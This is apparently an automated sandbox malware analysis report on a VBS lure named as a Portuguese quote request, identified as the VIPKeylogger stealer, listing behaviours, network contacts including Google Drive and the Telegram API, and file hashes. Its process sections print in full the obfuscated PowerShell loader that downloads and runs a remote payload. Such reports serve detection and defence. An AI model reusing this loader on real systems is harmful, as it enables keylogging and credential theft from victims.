Malware Analysis Report

2024-11-15 07:58

Sample ID 241023-r5ayqsxfjl
Target Pedido de Cotação-24100004_lista comercial.vbs
SHA256 400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
Tags
vipkeylogger discovery execution keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741

Threat Level: Known bad

The file Pedido de Cotação-24100004_lista comercial.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery execution keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-23 14:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-23 14:46

Reported

2024-10-23 14:48

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.73:80 crl.microsoft.com tcp

Files

memory/2672-4-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

memory/2672-6-0x0000000002340000-0x0000000002348000-memory.dmp

memory/2672-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2672-7-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-8-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-9-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-10-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-12-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

memory/2672-13-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-15-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp

MD5 53eb1a2da1daa6ff5f0ececcca12b7ef
SHA1 25998cd34dffa6cbdf55b227ab1a7fe728859e15
SHA256 0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa
SHA512 46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21

C:\Users\Admin\AppData\Roaming\Symbolerne.rab

MD5 4fa4bfe12534bd26a9e268a1e659e510
SHA1 f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA256 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA512 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01

memory/2972-19-0x00000000065E0000-0x000000000B7C9000-memory.dmp

memory/1856-20-0x00000000004D0000-0x0000000001532000-memory.dmp

memory/1856-42-0x00000000004D0000-0x0000000001532000-memory.dmp

memory/1856-43-0x00000000004D0000-0x0000000000518000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-23 14:46

Reported

2024-10-23 14:48

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 